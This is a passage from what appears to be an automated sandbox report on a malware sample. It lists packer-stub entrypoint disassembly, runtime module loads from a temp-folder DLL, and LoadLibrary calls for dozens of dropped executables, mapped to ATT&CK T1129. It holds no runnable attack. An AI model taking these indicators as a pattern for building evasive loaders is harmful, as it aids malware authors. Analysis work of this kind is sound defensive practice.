ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bnbhnh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rjlbldf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dndhhn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"688844.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"464204.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"442444.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"644444.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"26400.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"286488.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"482480.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"620006.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"620006.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"620006.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"620006.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"620006.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"620006.exe\" loaded module \"MSVCRT.DLL\" at base 76570000\n \"620006.exe\" loaded module \"SHLWAPI.DLL\" at base 758c0000\n \"620006.exe\" loaded module \"USER32.DLL\" at base 77620000\n \"620006.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"lvhxj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"lvhxj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lvhxj.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"lvhxj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lvhxj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"pthnb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"pthnb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pthnb.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"pthnb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pthnb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"pthnb.exe\" loaded module \"MSVCRT.DLL\" at base 76570000\n \"pthnb.exe\" loaded module \"SHLWAPI.DLL\" at base 758c0000\n \"pthnb.exe\" loaded module \"USER32.DLL\" at base 77620000\n \"pthnb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"pdrvn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"pdrvn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pdrvn.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"pdrvn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pdrvn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"xjdpttx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"xjdpttx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xjdpttx.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"xjdpttx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xjdpttx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"848482.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"06462.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"06462.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"06462.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"06462.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"06462.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"06462.exe\" loaded module \"MSVCRT.DLL\" at base 76570000\n \"06462.exe\" loaded module \"SHLWAPI.DLL\" at base 758c0000\n \"06462.exe\" loaded module \"USER32.DLL\" at base 77620000\n \"06462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"2688428.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"2688428.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2688428.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"2688428.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2688428.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"642824.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"642824.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"642824.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"642824.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"642824.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"642824.exe\" loaded module \"KERNEL32.DLL\" at base 76db0000\n \"642824.exe\" loaded module \"MSVCRT.DLL\" at base 76570000\n \"642824.exe\" loaded module \"SHLWAPI.DLL\" at base 758c0000\n \"642824.exe\" loaded module \"USER32.DLL\" at base 77620000\n \"642824.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"rjjxrvl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"rjjxrvl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rjjxrvl.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"rjjxrvl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rjjxrvl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"lvvjfph.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"lvvjfph.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lvvjfph.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"lvvjfph.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lvvjfph.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"drlrf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"drlrf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"drlrf.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"drlrf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xdhfnxr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"xdhfnxr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xdhfnxr.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"xdhfnxr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"drjtt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"drjtt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"drjtt.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"drjtt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"drjtt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"6886668.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"6886668.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6886668.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"6886668.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6886668.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"6886668.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"42042.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"42042.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"42042.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"42042.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"42042.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"thpxfjv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"thpxfjv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"thpxfjv.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"thpxfjv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"thpxfjv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"fnnxblt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"fnnxblt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fnnxblt.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"fnnxblt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"64268.exe\" loaded module \"MSVCRT.DLL\" at base 76570000\n \"64268.exe\" loaded module \"SHLWAPI.DLL\" at base 758c0000\n \"64268.exe\" loaded module \"USER32.DLL\" at base 77620000\n \"64268.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"62440.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"62440.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"62440.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"62440.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"62440.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"64402.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"026424.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"026424.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"026424.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"026424.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"026424.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"xddtpjj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"xddtpjj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xddtpjj.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"xddtpjj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xddtpjj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"ndhlfdh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"ndhlfdh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ndhlfdh.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"ndhlfdh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ndhlfdh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"fjtbx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"fjtbx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fjtbx.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"fjtbx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fjtbx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"64288.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"64288.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"64288.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"64288.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"64288.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"64288.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"226448.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"226448.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"226448.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"226448.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"226448.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"60644.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"60644.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"60644.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"60644.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"60644.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"44664.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"44664.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"44664.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"44664.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"44664.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"024668.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"024668.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"024668.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"024668.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"024668.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"08406.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"08406.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"08406.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"08406.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"08406.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"062028.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"062028.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"062028.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"062028.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"062028.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"482480.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"482480.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"482480.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"482480.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"482480.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"286488.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"286488.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"286488.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"286488.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"26400.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"26400.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"26400.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"26400.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"26400.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"442444.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"442444.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"442444.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"442444.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"442444.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000\n \"464204.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"464204.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"464204.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"464204.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dndhhn.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"82440.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 726f0000\n \"82440.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"82440.exe\" loaded module \"KERNEL32\" at base 76db0000\n \"82440.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"82440.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a440000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006020)\n \"620006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005816)\n \"620006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005816)\n \"620006.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005816)\n \"620006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005816)\n \"620006.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00005816)\n \"620006.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005816)\n \"620006.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005816)\n \"lvhxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005952)\n \"lvhxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005952)\n \"lvhxj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005952)\n \"lvhxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005952)\n 